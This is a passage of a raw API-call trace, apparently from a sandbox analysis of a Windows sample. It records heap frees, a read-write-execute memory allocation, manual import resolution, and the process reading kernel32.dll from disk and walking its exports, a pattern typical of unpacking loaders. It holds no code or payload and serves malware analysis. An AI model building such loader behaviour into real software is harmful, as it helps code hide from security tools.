[0174.430] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2cdc680 | out: hHeap=0x590000) returned 1 [0174.430] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2cef890 | out: hHeap=0x590000) returned 1 [0174.434] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2d02aa0 | out: hHeap=0x590000) returned 1 [0174.434] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2d15cb0 | out: hHeap=0x590000) returned 1 [0174.434] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2d28ec0 | out: hHeap=0x590000) returned 1 [0174.434] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2d3c0d0 | out: hHeap=0x590000) returned 1 [0174.434] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2d4f2e0 | out: hHeap=0x590000) returned 1 [0174.435] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2d624f0 | out: hHeap=0x590000) returned 1 [0174.436] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2d75700 | out: hHeap=0x590000) returned 1 [0174.436] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2d88910 | out: hHeap=0x590000) returned 1 [0174.436] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2db0080 | out: hHeap=0x590000) returned 1 [0174.436] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2dc3290 | out: hHeap=0x590000) returned 1 [0174.436] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2dd64a0 | out: hHeap=0x590000) returned 1 [0174.436] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2de96b0 | out: hHeap=0x590000) returned 1 [0174.436] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2dfc8c0 | out: hHeap=0x590000) returned 1 [0174.436] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2e0fad0 | out: hHeap=0x590000) returned 1 [0174.436] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2e22ce0 | out: hHeap=0x590000) returned 1 [0174.436] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2e35ef0 | out: hHeap=0x590000) returned 1 [0174.436] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2e49100 | out: hHeap=0x590000) returned 1 [0174.441] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2e5c310 | out: hHeap=0x590000) returned 1 [0174.444] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2e6f520 | out: hHeap=0x590000) returned 1 [0174.444] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2e82730 | out: hHeap=0x590000) returned 1 [0174.444] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2e95940 | out: hHeap=0x590000) returned 1 [0174.444] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2ea8b50 | out: hHeap=0x590000) returned 1 [0174.446] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2ebbd60 | out: hHeap=0x590000) returned 1 [0174.447] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2ecef70 | out: hHeap=0x590000) returned 1 [0174.447] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2ee2180 | out: hHeap=0x590000) returned 1 [0174.447] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2ef5390 | out: hHeap=0x590000) returned 1 [0174.447] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2f085a0 | out: hHeap=0x590000) returned 1 [0174.447] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2f1b7b0 | out: hHeap=0x590000) returned 1 [0174.448] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2f2e9c0 | out: hHeap=0x590000) returned 1 [0174.449] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2f41bd0 | out: hHeap=0x590000) returned 1 [0174.449] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2f54de0 | out: hHeap=0x590000) returned 1 [0174.449] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2f67ff0 | out: hHeap=0x590000) returned 1 [0174.449] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2f7b200 | out: hHeap=0x590000) returned 1 [0174.449] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2f8e410 | out: hHeap=0x590000) returned 1 [0174.449] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2fa1620 | out: hHeap=0x590000) returned 1 [0174.449] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2fb4830 | out: hHeap=0x590000) returned 1 [0174.560] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2fc7a40 | out: hHeap=0x590000) returned 1 [0174.560] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2fdac50 | out: hHeap=0x590000) returned 1 [0174.561] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2fede60 | out: hHeap=0x590000) returned 1 [0174.561] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x3001070 | out: hHeap=0x590000) returned 1 [0174.561] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x3014280 | out: hHeap=0x590000) returned 1 [0174.561] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x3027490 | out: hHeap=0x590000) returned 1 [0174.561] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x303a6a0 | out: hHeap=0x590000) returned 1 [0174.561] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x304d8b0 | out: hHeap=0x590000) returned 1 [0174.561] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x3060ac0 | out: hHeap=0x590000) returned 1 [0174.561] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x3073cd0 | out: hHeap=0x590000) returned 1 [0174.561] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x3086ee0 | out: hHeap=0x590000) returned 1 [0174.561] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x309a0f0 | out: hHeap=0x590000) returned 1 [0174.564] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x30ad300 | out: hHeap=0x590000) returned 1 [0174.566] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x30c0510 | out: hHeap=0x590000) returned 1 [0174.569] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x30d3720 | out: hHeap=0x590000) returned 1 [0175.258] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0175.262] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0175.263] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0175.264] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0175.264] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0175.264] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0175.264] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0175.264] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0175.264] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0175.264] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0175.264] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0175.265] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0175.265] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0175.265] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0175.265] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0175.265] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0175.265] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0175.265] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0175.265] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0175.265] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0175.266] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0175.266] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0175.266] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0175.266] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0175.266] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0175.266] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0175.266] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0175.266] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5bdb40 | out: hHeap=0x590000) returned 1 [0175.267] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd940 | out: hHeap=0x590000) returned 1 [0175.271] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a0090 | out: hHeap=0x590000) returned 1 [0175.272] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0175.273] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0175.273] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0175.273] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0175.273] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0175.273] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0175.275] GetProcessHeap () returned 0x590000 [0175.275] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x68) returned 0x598d40 [0175.275] GetProcessHeap () returned 0x590000 [0175.276] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a9300 [0175.276] GetProcessHeap () returned 0x590000 [0175.276] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x48) returned 0x5a07c0 [0175.276] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0175.276] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0175.277] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0175.277] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0175.277] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0175.277] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0175.277] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0175.277] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0175.277] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0175.277] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0175.277] GetModuleFileNameA (in: hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0175.277] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0175.287] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0175.287] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0175.287] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0175.287] GetProcessHeap () returned 0x590000 [0175.287] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xac430) returned 0x5bc5f0 [0175.290] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0175.291] ReadFile (in: hFile=0x134, lpBuffer=0x5bc5f0, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x5bc5f0*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0175.441] CloseHandle (hObject=0x134) returned 1 [0175.442] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0175.449] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0175.449] lstrcmpA (lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0175.449] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0175.449] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0175.449] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0175.449] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0175.449] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0175.449] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0175.449] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 1 [0175.449] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0175.449] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0175.449] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0175.449] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0175.449] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") returned 1 [0175.449] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0175.449] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0175.449] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomW") returned 0 [0175.450] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0175.450] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0175.450] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0175.450] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0175.450] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0175.450] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0175.450] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0175.450] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0175.450] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0175.450] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0175.450] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0175.450] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0175.450] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0175.450] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0175.450] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0175.450] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0175.450] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0175.450] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0175.450] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0175.450] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0175.450] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0175.450] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0175.450] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0175.450] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0175.450] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0175.451] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0175.451] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0175.451] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0175.451] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0175.451] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0175.451] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0175.451] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0175.451] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0175.451] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0175.451] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0175.451] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0175.451] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0175.451] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") returned 1 [0175.451] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0175.451] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0175.451] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0175.451] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0175.451] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0175.451] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0175.451] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0175.451] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0175.451] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0175.451] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0175.452] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0175.452] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0175.452] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0175.452] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0175.452] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0175.452] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0175.452] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0175.452] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0175.452] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0175.452] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0175.452] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0175.452] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0175.452] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0175.452] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0175.452] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0175.452] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0175.452] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0175.452] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0175.452] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0175.452] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0175.452] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0175.452] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0175.452] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0175.452] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0175.452] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0175.452] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtx") returned 1 [0175.452] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0175.453] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0175.453] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0175.453] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0175.453] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0175.453] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0175.453] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0175.453] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0175.453] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0175.453] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0175.453] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0175.453] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0175.453] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0175.453] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtx") returned 1 [0175.453] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0175.453] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0175.453] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0175.453] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0175.453] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0175.453] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0175.453] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0175.453] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0175.453] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0175.453] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0175.454] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0175.454] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0175.454] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0175.454] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0175.454] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0175.454] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0175.454] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0175.454] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0175.454] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0175.454] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0175.454] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0175.454] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0175.454] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0175.454] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0175.454] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0175.454] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0175.454] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0175.454] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0175.454] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0175.454] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0175.454] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0175.454] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0175.454] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0175.454] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0175.454] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0175.454] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0175.454] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0175.454] lstrcmpA 